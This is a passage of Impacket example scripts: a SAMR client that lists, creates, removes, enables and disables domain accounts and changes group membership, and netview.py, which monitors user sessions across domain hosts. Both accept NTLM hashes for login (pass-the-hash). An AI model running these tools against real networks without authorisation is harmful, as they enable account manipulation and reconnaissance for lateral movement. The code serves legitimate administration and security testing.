self._get_object_rid(domain_handle, username)\n response = samr.hSamrOpenUser(self._dce, domain_handle, samr.MAXIMUM_ALLOWED, user_rid)\n return response['UserHandle']\n\n def _get_group_handle(self, domain_handle, alias_name):\n group_rid = self._get_object_rid(domain_handle, alias_name)\n response = samr.hSamrOpenGroup(self._dce, domain_handle, samr.MAXIMUM_ALLOWED, group_rid)\n return response['GroupHandle']\n\n def _get_alias_handle(self, domain_handle, alias_name):\n alias_rid = self._get_object_rid(domain_handle, alias_name)\n response = samr.hSamrOpenAlias(self._dce, domain_handle, samr.MAXIMUM_ALLOWED, alias_rid)\n return response['AliasHandle']\n\n def _open_domain(self, builtin=False):\n if self._domain_handle is None:\n self._domain_handle = self.__get_domain_handle(builtin)\n return self._domain_handle\n\n def _close_domain(self):\n if self._domain_handle != None:\n samr.hSamrCloseHandle(self._dce, self._domain_handle)\n self._domain_handle = None\n\n def __get_domain_handle(self, builtin=False):\n index = 1 if builtin else 0\n server_handle = samr.hSamrConnect(self._dce)['ServerHandle']\n domain_name = samr.hSamrEnumerateDomainsInSamServer(self._dce, server_handle)['Buffer']['Buffer'][index]['Name']\n domain_id = samr.hSamrLookupDomainInSamServer(self._dce, server_handle, domain_name)['DomainId']\n domain_handle = samr.hSamrOpenDomain(self._dce, server_handle, domainId=domain_id)['DomainHandle']\n return domain_handle\n\n\nclass User(SamrObject):\n def __init__(self, smbConnection):\n super().__init__(smbConnection)\n self._create_account_type = samr.USER_NORMAL_ACCOUNT\n self._enum_account_type = samr.USER_NORMAL_ACCOUNT\n\n def Enumerate(self):\n domain_handle = self._open_domain()\n try:\n response = samr.hSamrEnumerateUsersInDomain(self._dce, domain_handle, self._enum_account_type)\n for item in response['Buffer']['Buffer']:\n yield item\n except samr.DCERPCSessionError as e:\n if str(e).find('STATUS_MORE_ENTRIES') < 0:\n raise\n finally:\n self._close_domain()\n \n def Query(self, name):\n domain_handle = self._open_domain(False)\n try:\n user_handle = self._get_user_handle(domain_handle, name)\n response = samr.hSamrQueryInformationUser2(self._dce, user_handle, samr.USER_INFORMATION_CLASS.UserAllInformation)\n response = response['Buffer']['All']\n\n # Get groups that user is member of\n groups = samr.hSamrGetGroupsForUser(self._dce, user_handle)['Groups']['Groups']\n group_id_list = list(map(lambda g: g['RelativeId'], groups))\n\n sidArray = samr.SAMPR_PSID_ARRAY()\n for gid in group_id_list:\n group_handle = samr.hSamrOpenGroup(self._dce, domain_handle, groupId=gid)['GroupHandle']\n group_sid = samr.hSamrRidToSid(self._dce, group_handle, gid)['Sid']\n si = samr.PSAMPR_SID_INFORMATION()\n si['SidPointer'] = group_sid\n sidArray['Sids'].append(si)\n samr.hSamrCloseHandle(self._dce, group_handle)\n \n global_lookup_ids = samr.hSamrLookupIdsInDomain(self._dce, domain_handle, group_id_list)\n response.fields['GlobalGroups'] = list(map(lambda a: a['Data'], global_lookup_ids['Names']['Element']))\n\n self._close_domain()\n domain_handle = self._open_domain(True)\n\n alias_membership = samr.hSamrGetAliasMembership(self._dce, domain_handle, sidArray)\n alias_id_list = list(map(lambda a: a['Data'], alias_membership['Membership']['Element']))\n\n local_lookup_ids = samr.hSamrLookupIdsInDomain(self._dce, domain_handle, alias_id_list)\n response.fields['LocalGroups'] = list(map(lambda a: a['Data'], local_lookup_ids['Names']['Element']))\n return response\n\n except samr.DCERPCSessionError as e:\n if str(e).find('STATUS_MORE_ENTRIES') < 0:\n raise\n finally:\n self._close_domain()\n\n def Create(self, name, new_password, new_nt_hash=''):\n domain_handle = self._open_domain()\n user_handle = samr.hSamrCreateUser2InDomain(self._dce, domain_handle, name, self._create_account_type, samr.USER_ALL_ACCESS)['UserHandle']\n try:\n samr.hSamrSetNTInternal1(self._dce, user_handle, new_password, new_nt_hash)\n except samr.DCERPCSessionError as e:\n samr.hSamrDeleteUser(self._dce, user_handle)\n raise\n else:\n self._hEnableAccount(user_handle)\n finally:\n self._close_domain()\n\n def Remove(self, name):\n domain_handle = self._open_domain()\n try:\n user_handle = self._get_user_handle(domain_handle, name)\n samr.hSamrDeleteUser(self._dce, user_handle)\n finally:\n self._close_domain()\n\n def _hEnableAccount(self, user_handle):\n user_account_control = samr.hSamrQueryInformationUser2(self._dce, user_handle, samr.USER_INFORMATION_CLASS.UserAllInformation)['Buffer']['All']['UserAccountControl']\n buffer = samr.SAMPR_USER_INFO_BUFFER()\n buffer['tag'] = samr.USER_INFORMATION_CLASS.UserControlInformation\n buffer['Control']['UserAccountControl'] = user_account_control ^ samr.USER_ACCOUNT_DISABLED\n samr.hSamrSetInformationUser2(self._dce, user_handle, buffer)\n\n def _hDisableAccount(self, user_handle):\n user_account_control = samr.hSamrQueryInformationUser2(self._dce, user_handle, samr.USER_INFORMATION_CLASS.UserAllInformation)['Buffer']['All']['UserAccountControl']\n buffer = samr.SAMPR_USER_INFO_BUFFER()\n buffer['tag'] = samr.USER_INFORMATION_CLASS.UserControlInformation\n buffer['Control']['UserAccountControl'] = samr.USER_ACCOUNT_DISABLED | user_account_control\n samr.hSamrSetInformationUser2(self._dce, user_handle, buffer)\n\n def SetUserAccountControl(self, name, action):\n info = self.Query(name)\n domain_handle = self._open_domain()\n try:\n user_handle = self._get_user_handle(domain_handle, name)\n if action == 'enable':\n self._hEnableAccount(user_handle)\n else:\n self._hDisableAccount(user_handle)\n finally:\n self._close_domain()\n\n\n\nclass Computer(User):\n def __init__(self, smbConnection):\n super().__init__(smbConnection)\n self._create_account_type = samr.USER_WORKSTATION_TRUST_ACCOUNT\n self._enum_account_type = samr.USER_WORKSTATION_TRUST_ACCOUNT | samr.USER_SERVER_TRUST_ACCOUNT\n\n\nclass Group(SamrObject):\n def Enumerate(self):\n domain_handle = self._open_domain()\n try:\n response = samr.hSamrEnumerateGroupsInDomain(self._dce, domain_handle)\n for item in response['Buffer']['Buffer']:\n yield item\n except samr.DCERPCSessionError as e:\n if str(e).find('STATUS_MORE_ENTRIES') < 0:\n raise\n finally:\n self._close_domain()\n \n def Query(self, group_name):\n domain_handle = self._open_domain()\n try:\n group_handle = self._get_group_handle(domain_handle, group_name)\n response = samr.hSamrGetMembersInGroup(self._dce, group_handle)\n response = samr.hSamrLookupIdsInDomain(self._dce, domain_handle, list(map(lambda a: a['Data'], response['Members']['Members'])))\n return list(map(lambda a: a['Data'], response['Names']['Element']))\n finally:\n self._close_domain()\n\n def Join(self, group_name, username):\n domain_handle = self._open_domain()\n try:\n group_handle = self._get_group_handle(domain_handle, group_name)\n user_rid = self._get_object_rid(domain_handle, username)\n samr.hSamrAddMemberToGroup(self._dce, group_handle, user_rid, samr.SE_GROUP_ENABLED_BY_DEFAULT)\n finally:\n self._close_domain()\n\n def UnJoin(self, group_name, username):\n domain_handle = self._open_domain()\n try:\n group_handle = self._get_group_handle(domain_handle, group_name)\n user_rid = self._get_object_rid(domain_handle, username)\n samr.hSamrRemoveMemberFromGroup(self._dce, group_handle, user_rid)\n finally:\n self._close_domain()\n\n\nclass Localgroup(Group):\n def Enumerate(self):\n domain_handle = self._open_domain(True)\n try:\n response = samr.hSamrEnumerateAliasesInDomain(self._dce, domain_handle)\n for item in response['Buffer']['Buffer']:\n yield item\n except samr.DCERPCSessionError as e:\n if str(e).find('STATUS_MORE_ENTRIES') < 0:\n raise\n finally:\n self._close_domain()\n \n def Query(self, group_name):\n domain_handle = self._open_domain(True)\n try:\n alias_handle = self._get_alias_handle(domain_handle, group_name)\n response = samr.hSamrGetMembersInAlias(self._dce, alias_handle)\n response = self._resolve_sid(list(map(lambda s: s['Data']['SidPointer'].formatCanonical(), response['Members']['Sids'])))\n return list(map(lambda x: x['Name'], response))\n finally:\n self._close_domain()\n\n def Join(self, group_name, username):\n domain_handle = self._open_domain(True)\n try:\n alias_handle = self._get_alias_handle(domain_handle, group_name)\n user_sid = self._get_user_sid(username)\n samr.hSamrAddMemberToAlias(self._dce, alias_handle, user_sid)\n finally:\n self._close_domain()\n\n def UnJoin(self, group_name, username):\n domain_handle = self._open_domain(True)\n try:\n alias_handle = self._get_alias_handle(domain_handle, group_name)\n user_sid = self._get_user_sid(username)\n samr.hSamrRemoveMemberFromAlias(self._dce, alias_handle, user_sid)\n finally:\n self._close_domain()\n\n\nclass Net:\n def __init__(self, domain, username, password, options):\n self.__domain = domain\n self.__username = username\n self.__password = password\n self.__options = options\n self.__action = options.entry.lower()\n self.__lmhash = ''\n self.__nthash = ''\n self.__aesKey = options.aesKey\n self.__doKerberos = options.k\n self.__kdcHost = options.dc_ip\n self.__smbConnection = None\n\n if options.hashes is not None:\n self.__lmhash, self.__nthash = options.hashes.split(':')\n\n def connect(self, remoteName, remoteHost):\n self.__smbConnection = SMBConnection(remoteName, remoteHost, sess_port=int(self.__options.port))\n\n if self.__doKerberos:\n self.__smbConnection.kerberosLogin(self.__username, self.__password, self.__domain, self.__lmhash,\n self.__nthash, self.__aesKey, self.__kdcHost)\n else:\n self.__smbConnection.login(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)\n\n def disconnect(self):\n self.__smbConnection.close()\n self.__smbConnection = None\n\n def run(self, remoteName, remoteHost):\n self.connect(remoteName, remoteHost)\n\n actionClass = self.__get_action_class(self.__action)\n actionObject = actionClass(self.__smbConnection)\n\n if self.__is_option_present(self.__options, 'create'):\n print(\"[*] Creating {} account '{}'\".format(self.__action, self.__options.create))\n actionObject.Create(self.__options.create, self.__options.newPasswd)\n print(\"[+] {} account created succesfully: {}:{}\".format(self.__action, self.__options.create, self.__options.newPasswd))\n\n elif self.__is_option_present(self.__options, 'remove'):\n print(\"[*] Deleting {} account '{}'\".format(self.__action, self.__options.remove))\n actionObject.Remove(self.__options.remove)\n print(\"[+] {} account deleted succesfully!\".format(self.__action))\n\n elif self.__is_option_present(self.__options, 'enable'):\n print(\"[*] Enabling {} account '{}'\".format(self.__action, self.__options.enable))\n actionObject.SetUserAccountControl(self.__options.enable, \"enable\")\n print(\"[+] {} account enabled succesfully!\".format(self.__action))\n\n elif self.__is_option_present(self.__options, 'disable'):\n print(\"[*] Disabling {} account '{}'\".format(self.__action, self.__options.disable))\n actionObject.SetUserAccountControl(self.__options.disable, \"disable\")\n print(\"[+] {} account disabled succesfully!\".format(self.__action))\n\n elif self.__is_option_present(self.__options, 'join'):\n print(\"[*] Adding user account '{}' to group '{}'\".format(self.__options.join,self.__options.name))\n actionObject.Join(self.__options.name, self.__options.join)\n print(\"[+] User account added to {} succesfully!\".format(self.__options.name))\n\n elif self.__is_option_present(self.__options, 'unjoin'):\n print(\"[*] Removing user account '{}' from group '{}'\".format(self.__options.unjoin,self.__options.name))\n actionObject.UnJoin(self.__options.name, self.__options.unjoin)\n print(\"[+] User account removed from {} succesfully!\".format(self.__options.name))\n\n elif self.__is_option_present(self.__options, 'name'):\n info = actionObject.Query(self.__options.name)\n if type(info) == list:\n i = 1\n for member in info:\n print(\" {0}. {1}\".format(i, member))\n i += 1\n else:\n print(\"User name\".ljust(30), info['UserName'])\n print(\"Full name\".ljust(30), info['FullName'])\n print(\"Comment\".ljust(30), info['AdminComment'])\n print(\"User's comment\".ljust(30), info['UserComment'])\n print(\"Country/region code\".ljust(30), \"000 (System Default)\" if info['CountryCode'] == 0 else info['CountryCode'])\n print(\"Account active\".ljust(30), self.__b2s(info['UserAccountControl'] & samr.USER_ACCOUNT_DISABLED != samr.USER_ACCOUNT_DISABLED))\n print(\"Account expires\".ljust(30), self.__get_time_string(info['AccountExpires']))\n print('')\n print(\"Password last set\".ljust(30), self.__get_time_string(info['PasswordLastSet']))\n print(\"Password expires\".ljust(30), self.__get_time_string(info['PasswordMustChange']))\n print(\"Password changeable\".ljust(30), self.__get_time_string(info['PasswordCanChange']))\n print(\"Password required\".ljust(30), self.__b2s(info['WhichFields'] & samr.USER_PASSWORD_NOT_REQUIRED == samr.USER_PASSWORD_NOT_REQUIRED))\n print(\"User may change password\".ljust(30), self.__b2s(info['WhichFields'] & samr.UF_PASSWD_CANT_CHANGE == samr.UF_PASSWD_CANT_CHANGE))\n print('')\n print(\"Workstations allowed\".ljust(30), \"All\" if not info['WorkStations'] else info['WorkStations'])\n print(\"Logon script\".ljust(30), info['ScriptPath'])\n print(\"User profile\".ljust(30), info['ProfilePath'])\n print(\"Home directory\".ljust(30), info['HomeDirectory'])\n print(\"Last logon\".ljust(30), self.__get_time_string(info['LastLogon']))\n print(\"Logon count\".ljust(30), info['LogonCount'])\n print('')\n print(\"Logon hours allowed\".ljust(30), self.__format_logon_hours(info['LogonHours']['LogonHours']))\n print('')\n print(\"Local Group Memberships\")\n for group in info['LocalGroups']:\n print(\" * {}\".format(group))\n print('')\n print(\"Global Group memberships\")\n for group in info['GlobalGroups']:\n print(\" * {}\".format(group))\n\n else:\n print(\"[*] Enumerating {}s ..\".format(self.__action))\n i = 1\n for object in actionObject.Enumerate():\n messae = \" {0}. {1}\".format(i, object['Name'])\n if self.__options.debug:\n messae += \" ({0})\".format(object['RelativeId'])\n print(messae)\n i += 1\n\n self.disconnect()\n\n def __getUnixTime(self, t):\n t -= 116444736000000000\n t /= 10000000\n return t\n\n def __get_time_string(self, large_integer):\n time = (large_integer['HighPart'] << 32) + large_integer['LowPart']\n if time == 0 or time == 0x7FFFFFFFFFFFFFFF:\n time = 'Never'\n else:\n time = datetime.fromtimestamp(self.__getUnixTime(time))\n time = time.strftime(\"%m/%d/%Y %H:%M:%S %p\")\n return time\n \n def __format_logon_hours(self, s):\n logon_hours = ''.join(map(lambda b: b.hex(), s))\n if logon_hours == ('f' * 42):\n logon_hours = \"All\"\n return logon_hours\n \n def __b2s(self, b):\n return \"Yes\" if b else \"No\"\n\n def __get_action_class(self, action):\n return getattr(sys.modules[__name__], action.capitalize())\n \n def __is_option_present(self, options, option):\n return hasattr(options, option) and getattr(options, option)\n\n\n\nif __name__ == '__main__':\n print(version.BANNER)\n\n parser = argparse.ArgumentParser(add_help = True, description = \"SAMR rpc client implementation.\")\n\n parser.add_argument('target', action='store', help='[[domain/]username[:password]@]')\n parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')\n parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')\n\n subparsers = parser.add_subparsers(help='An account entry name', dest='entry', required=True)\n\n user_parser = subparsers.add_parser('user', help='Enumerate all domain/local user accounts')\n user_parser.add_argument('-name', action=\"store\", metavar = \"NAME\", help='Display single user information.')\n user_parser.add_argument('-create', action=\"store\", metavar = \"NAME\", help='Add new user account to domain/computer.')\n user_parser.add_argument('-remove', action=\"store\", metavar = \"NAME\", help='Remove existing user account from domain/computer.')\n user_parser.add_argument('-newPasswd', action=\"store\", metavar = \"PASSWORD\", help='New password to set for creating account.')\n user_parser.add_argument('-enable', action=\"store\", metavar = \"NAME\", help='Enables account.')\n user_parser.add_argument('-disable', action=\"store\", metavar = \"NAME\", help='Disables account.')\n\n computer_parser = subparsers.add_parser('computer', help='Enumerate all computers in domain level')\n computer_parser.add_argument('-name', action=\"store\", metavar = \"NAME\", help='Display single computer information.')\n computer_parser.add_argument('-create', action=\"store\", metavar = \"NAME\", help='Add new computer account to domain.')\n computer_parser.add_argument('-remove', action=\"store\", metavar = \"NAME\", help='Remove existing computer account from domain.')\n computer_parser.add_argument('-newPasswd', action=\"store\", metavar = \"PASSWORD\", help='New password to set for creating account.')\n computer_parser.add_argument('-enable', action=\"store\", metavar = \"NAME\", help='Enables account.')\n computer_parser.add_argument('-disable', action=\"store\", metavar = \"NAME\", help='Disables account.')\n\n localgroup_parser = subparsers.add_parser('localgroup', help='Enumerate local groups (aliases) of local computer')\n localgroup_parser.add_argument('-name', action=\"store\", metavar = \"NAME\", help='Operate on single specific domain group account.')\n localgroup_parser.add_argument('-join', action=\"store\", metavar = \"USER\", help='Add user account to specific group.')\n localgroup_parser.add_argument('-unjoin', action=\"store\", metavar = \"USER\", help='Remove user account from specific group.')\n\n group_parser = subparsers.add_parser('group', help='Enumerate domain groups registered in domain controller')\n group_parser.add_argument('-name', action=\"store\", metavar = \"NAME\", help='Operate on single specific localgroup account.')\n group_parser.add_argument('-join', action=\"store\", metavar = \"USER\", help='Add user account to specific group.')\n group_parser.add_argument('-unjoin', action=\"store\", metavar = \"USER\", help='Remove user account from specific group.')\n\n group = parser.add_argument_group('authentication')\n\n group.add_argument('-hashes', action=\"store\", metavar = \"LMHASH:NTHASH\", help='NTLM hashes, format is LMHASH:NTHASH')\n group.add_argument('-no-pass', action=\"store_true\", help='don\\'t ask for password (useful for -k)')\n group.add_argument('-k', action=\"store_true\", help='Use Kerberos authentication. Grabs credentials from ccache file '\n '(KRB5CCNAME) based on target parameters. If valid credentials '\n 'cannot be found, it will use the ones specified in the command '\n 'line')\n group.add_argument('-aesKey', action=\"store\", metavar = \"hex key\", help='AES key to use for Kerberos Authentication '\n '(128 or 256 bits)')\n\n group = parser.add_argument_group('connection')\n\n group.add_argument('-dc-ip', action='store', metavar=\"ip address\",\n help='IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in '\n 'the target parameter')\n group.add_argument('-target-ip', action='store', metavar=\"ip address\",\n help='IP Address of the target machine. If omitted it will use whatever was specified as target. '\n 'This is useful when target is the NetBIOS name and you cannot resolve it')\n group.add_argument('-port', choices=['139', '445'], nargs='?', default='445', metavar=\"destination port\",\n help='Destination port to connect to SMB Server')\n\n if len(sys.argv) == 1:\n parser.print_help()\n sys.exit(1)\n\n options = parser.parse_args()\n\n if ((hasattr(options, 'join') and options.join) or hasattr(options, 'unjoin') and options.unjoin) and not options.name:\n logging.error(\"argument '-name' is required with join/unjoin operations.\")\n sys.exit(1)\n\n if (hasattr(options, 'create') and options.create) and (not hasattr(options, 'create') or not options.newPasswd):\n logging.error(\"argument '-newPasswd' is required for creating new account.\")\n sys.exit(1)\n\n logger.init(options.ts, options.debug)\n\n domain, username, password, address = parse_target(options.target)\n\n if options.target_ip is None:\n options.target_ip = address\n\n if domain is None:\n domain = ''\n\n if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:\n from getpass import getpass\n password = getpass(\"Password: \")\n\n if options.aesKey is not None:\n options.k = True\n\n if options.hashes is not None:\n lmhash, nthash = options.hashes.split(':')\n else:\n lmhash = ''\n nthash = ''\n\n net = Net(domain, username, password, options)\n try:\n net.run(address, options.target_ip)\n except Exception as e:\n if logging.getLogger().level == logging.DEBUG:\n import traceback\n traceback.print_exc()\n logging.error(str(e))\n" }, { "path": "examples/netview.py", "content": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# The idea of this script is to get a list of the sessions\n# opened at the remote hosts and keep track of them.\n# Coincidentally @mubix did something similar a few years\n# ago so credit goes to him (and the script's name ;)).\n# Check it out at https://github.com/mubix/netview\n# The main difference with our approach is we keep\n# looping over the hosts found and keep track of who logged\n# in/out from remote servers. Plus, we keep the connections\n# with the target systems and just send a few DCE-RPC packets.\n#\n# One VERY IMPORTANT thing is:\n#\n# YOU HAVE TO BE ABLE TO RESOLV THE DOMAIN MACHINES NETBIOS\n# NAMES. That's usually solved by setting your DNS to the\n# domain DNS (and the right search domain).\n#\n# Some examples of usage are:\n#\n# netview.py -target 192.168.1.10 beto\n#\n# This will show the sessions on 192.168.1.10 and will authenticate as 'beto'\n# (password will be prompted)\n#\n# netview.py FREEFLY.NET/beto\n#\n# This will download all machines from FREEFLY.NET, authenticated as 'beto'\n# and will gather the session information for those machines that appear\n# to be up. There is a background thread checking aliveness of the targets\n# at all times.\n#\n# netview.py -users /tmp/users -dc-ip freefly-dc.freefly.net -k FREEFLY.NET/beto\n#\n# This will download all machines from FREEFLY.NET, authenticating using\n# Kerberos (that's why -dc-ip parameter is needed), and filter\n# the output based on the list of users specified in /tmp/users file.\n#\n# Author:\n# beto (@agsolino)\n#\n\nfrom __future__ import division\nfrom __future__ import print_function\nimport sys\nimport argparse\nimport logging\nimport socket\nfrom threading import Thread, Event\nfrom queue import Queue\nfrom time import sleep\n\nfrom impacket.examples import logger\nfrom impacket.examples.utils import parse_identity\nfrom impacket import version\nfrom impacket.smbconnection import SessionError\nfrom impacket.dcerpc.v5 import transport, wkst, srvs, samr\nfrom impacket.dcerpc.v5.ndr import NULL\nfrom impacket.dcerpc.v5.rpcrt import DCERPCException\nfrom impacket.nt_errors import STATUS_MORE_ENTRIES\n\nmachinesAliveQueue = Queue()\nmachinesDownQueue = Queue()\n\nmyIP = None\n\n\ndef checkMachines(machines, stopEvent, singlePass=False):\n origLen = len(machines)\n deadMachines = machines\n done = False\n while not done:\n if stopEvent.is_set():\n done = True\n break\n for machine in deadMachines:\n s = socket.socket()\n try:\n s = socket.create_connection((machine, 445), 2)\n global myIP\n myIP = s.getsockname()[0]\n s.close()\n machinesAliveQueue.put(machine)\n except Exception as e:\n logging.debug('%s: not alive (%s)' % (machine, e))\n pass\n else:\n logging.debug('%s: alive!' % machine)\n deadMachines.remove(machine)\n if stopEvent.is_set():\n done = True\n break\n\n logging.debug('up: %d, down: %d, total: %d' % (origLen-len(deadMachines), len(deadMachines), origLen))\n if singlePass is True:\n done = True\n if not done:\n sleep(10)\n # Do we have some new deadMachines to add?\n while machinesDownQueue.empty() is False:\n deadMachines.append(machinesDownQueue.get())\n\nclass USERENUM:\n def __init__(self, username='', password='', domain='', hashes=None, aesKey=None, doKerberos=False, options=None):\n self.__username = username\n self.__password = password\n self.__domain = domain\n self.__lmhash = ''\n self.__nthash = ''\n self.__aesKey = aesKey\n self.__doKerberos = doKerberos\n self.__kdcHost = options.dc_ip\n self.__options = options\n self.__machinesList = list()\n self.__targets = dict()\n self.__filterUsers = None\n self.__targetsThreadEvent = None\n self.__targetsThread = None\n self.__maxConnections = int(options.max_connections)\n if hashes is not None:\n self.__lmhash, self.__nthash = hashes.split(':')\n\n def getDomainMachines(self):\n if self.__kdcHost is not None:\n domainController = self.__kdcHost\n elif self.__domain != '':\n domainController = self.__domain\n else:\n raise Exception('A domain is needed!')\n\n logging.info('Getting machine\\'s list from %s' % domainController)\n rpctransport = transport.SMBTransport(domainController, 445, r'\\samr', self.__username, self.__password,\n self.__domain, self.__lmhash, self.__nthash, self.__aesKey,\n doKerberos=self.__doKerberos, kdcHost = self.__kdcHost)\n dce = rpctransport.get_dce_rpc()\n dce.connect()\n dce.bind(samr.MSRPC_UUID_SAMR)\n try:\n resp = samr.hSamrConnect(dce)\n serverHandle = resp['ServerHandle'] \n\n resp = samr.hSamrEnumerateDomainsInSamServer(dce, serverHandle)\n domains = resp['Buffer']['Buffer']\n\n logging.info(\"Looking up users in domain %s\" % domains[0]['Name'])\n\n resp = samr.hSamrLookupDomainInSamServer(dce, serverHandle,domains[0]['Name'] )\n\n resp = samr.hSamrOpenDomain(dce, serverHandle = serverHandle, domainId = resp['DomainId'])\n domainHandle = resp['DomainHandle']\n\n status = STATUS_MORE_ENTRIES\n enumerationContext = 0\n while status == STATUS_MORE_ENTRIES:\n try:\n resp = samr.hSamrEnumerateUsersInDomain(dce, domainHandle, samr.USER_WORKSTATION_TRUST_ACCOUNT,\n enumerationContext=enumerationContext)\n except DCERPCException as e:\n if str(e).find('STATUS_MORE_ENTRIES') < 0:\n raise\n resp = e.get_packet()\n\n for user in resp['Buffer']['Buffer']:\n self.__machinesList.append(user['Name'][:-1])\n logging.debug('Machine name - rid: %s - %d'% (user['Name'], user['RelativeId']))\n\n enumerationContext = resp['EnumerationContext'] \n status = resp['ErrorCode']\n except Exception as e:\n raise e\n\n dce.disconnect()\n\n def getTargets(self):\n logging.info('Importing targets')\n if self.__options.target is None and self.__options.targets is None:\n # We need to download the list of machines from the domain\n self.getDomainMachines()\n elif self.__options.targets is not None:\n for line in self.__options.targets.readlines():\n self.__machinesList.append(line.strip(' \\r\\n'))\n else:\n # Just a single machine\n self.__machinesList.append(self.__options.target)\n logging.info(\"Got %d machines\" % len(self.__machinesList))\n \n def filterUsers(self):\n if self.__options.user is not None:\n self.__filterUsers = list()\n self.__filterUsers.append(self.__options.user)\n elif self.__options.users is not None:\n # Grab users list from a file\n self.__filterUsers = list()\n for line in self.__options.users.readlines():\n self.__filterUsers.append(line.strip(' \\r\\n'))\n else:\n self.__filterUsers = None\n\n def run(self):\n self.getTargets()\n self.filterUsers()\n #self.filterGroups()\n \n # Up to here we should have figured out the scope of our work\n self.__targetsThreadEvent = Event()\n if self.__options.noloop is False:\n # Start a separate thread checking the targets that are up\n self.__targetsThread = Thread(target=checkMachines, args=(self.__machinesList,self.__targetsThreadEvent))\n self.__targetsThread.start()\n else:\n # Since it's gonna be a one shoot test, we need to wait till it finishes\n checkMachines(self.__machinesList,self.__targetsThreadEvent, singlePass=True)\n\n while True:\n # Do we have more machines to add?\n while machinesAliveQueue.empty() is False:\n machine = machinesAliveQueue.get()\n logging.debug('Adding %s to the up list' % machine)\n self.__targets[machine] = {}\n self.__targets[machine]['SRVS'] = None\n self.__targets[machine]['WKST'] = None\n self.__targets[machine]['Admin'] = True\n self.__targets[machine]['Sessions'] = list()\n self.__targets[machine]['LoggedIn'] = set()\n \n for target in list(self.__targets.keys()):\n try:\n self.getSessions(target)\n self.getLoggedIn(target) \n except (SessionError, DCERPCException) as e:\n # We will silently pass these ones, might be issues with Kerberos, or DCE\n if str(e).find('LOGON_FAILURE') >=0:\n # For some reason our credentials don't work there, \n # taking it out from the list.\n logging.error('STATUS_LOGON_FAILURE for %s, discarding' % target)\n del(self.__targets[target])\n elif str(e).find('INVALID_PARAMETER') >=0:\n del(self.__targets[target])\n elif str(e).find('access_denied') >=0:\n # Can't access the target RPC call, most probably a Unix host\n # taking it out from the list\n del(self.__targets[target])\n else:\n logging.info(str(e))\n pass \n except KeyboardInterrupt:\n raise\n except Exception as e:\n #import traceback\n #traceback.print_exc()\n if str(e).find('timed out') >=0:\n # Most probably this site went down. taking it out\n # ToDo: add it back to the list of machines to check in\n # the separate thread - DONE\n del(self.__targets[target])\n machinesDownQueue.put(target)\n else:\n # These ones we will report\n logging.error(e)\n pass\n\n if self.__options.noloop is True:\n break\n\n logging.debug('Sleeping for %s seconds' % self.__options.delay)\n logging.debug('Currently monitoring %d active targets' % len(self.__targets))\n sleep(int(self.__options.delay))\n\n def getSessions(self, target):\n if self.__targets[target]['SRVS'] is None:\n stringSrvsBinding = r'ncacn_np:%s[\\PIPE\\srvsvc]' % target\n rpctransportSrvs = transport.DCERPCTransportFactory(stringSrvsBinding)\n if hasattr(rpctransportSrvs, 'set_credentials'):\n # This method exists only for selected protocol sequences.\n rpctransportSrvs.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash,\n self.__nthash, self.__aesKey)\n rpctransportSrvs.set_kerberos(self.__doKerberos, self.__kdcHost)\n\n dce = rpctransportSrvs.get_dce_rpc()\n dce.connect()\n dce.bind(srvs.MSRPC_UUID_SRVS)\n self.__maxConnections -= 1\n else:\n dce = self.__targets[target]['SRVS']\n\n try:\n resp = srvs.hNetrSessionEnum(dce, '\\x00', NULL, 10)\n except Exception as e:\n if str(e).find('Broken pipe') >= 0:\n # The connection timed-out. Let's try to bring it back next round\n self.__targets[target]['SRVS'] = None\n self.__maxConnections += 1\n return\n else:\n raise\n\n if self.__maxConnections < 0:\n # Can't keep this connection open. Closing it\n dce.disconnect()\n self.__maxConnections = 0\n else:\n self.__targets[target]['SRVS'] = dce\n\n # Let's see who createad a connection since last check\n tmpSession = list()\n printCRLF = False\n for session in resp['InfoStruct']['SessionInfo']['Level10']['Buffer']:\n userName = session['sesi10_username'][:-1]\n sourceIP = session['sesi10_cname'][:-1][2:]\n key = '%s\\x01%s' % (userName, sourceIP)\n myEntry = '%s\\x01%s' % (self.__username, myIP)\n tmpSession.append(key)\n if not(key in self.__targets[target]['Sessions']):\n # Skipping myself\n if key != myEntry:\n self.__targets[target]['Sessions'].append(key)\n # Are we filtering users?\n if self.__filterUsers is not None:\n if userName in self.__filterUsers:\n logging.info(\"%s: user %s logged from host %s - active: %d, idle: %d\" % (\n target, userName, sourceIP, session['sesi10_time'], session['sesi10_idle_time']))\n printCRLF = True\n else:\n logging.info(\"%s: user %s logged from host %s - active: %d, idle: %d\" % (\n target, userName, sourceIP, session['sesi10_time'], session['sesi10_idle_time']))\n printCRLF = True\n\n # Let's see who deleted a connection since last check\n for nItem, session in enumerate(self.__targets[target]['Sessions']):\n userName, sourceIP = session.split('\\x01')\n if session not in tmpSession:\n del(self.__targets[target]['Sessions'][nItem])\n # Are we filtering users?\n if self.__filterUsers is not None:\n if userName in self.__filterUsers:\n logging.info(\"%s: user %s logged off from host %s\" % (target, userName, sourceIP))\n printCRLF=True\n else:\n logging.info(\"%s: user %s logged off from host %s\" % (target, userName, sourceIP))\n printCRLF=True\n \n if printCRLF is True:\n print()\n \n def getLoggedIn(self, target):\n if self.__targets[target]['Admin'] is False:\n return\n\n if self.__targets[target]['WKST'] is None:\n stringWkstBinding = r'ncacn_np:%s[\\PIPE\\wkssvc]' % target\n rpctransportWkst = transport.DCERPCTransportFactory(stringWkstBinding)\n if hasattr(rpctransportWkst, 'set_credentials'):\n # This method exists only for selected protocol sequences.\n rpctransportWkst.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash,\n self.__nthash, self.__aesKey)\n rpctransportWkst.set_kerberos(self.__doKerberos, self.__kdcHost)\n\n dce = rpctransportWkst.get_dce_rpc()\n dce.connect()\n dce.bind(wkst.MSRPC_UUID_WKST)\n self.__maxConnections -= 1\n else:\n dce = self.__targets[target]['WKST']\n\n try:\n resp = wkst.hNetrWkstaUserEnum(dce,1)\n except Exception as e:\n if str(e).find('Broken pipe') >= 0:\n # The connection timed-out. Let's try to bring it back next round\n self.__targets[target]['WKST'] = None\n 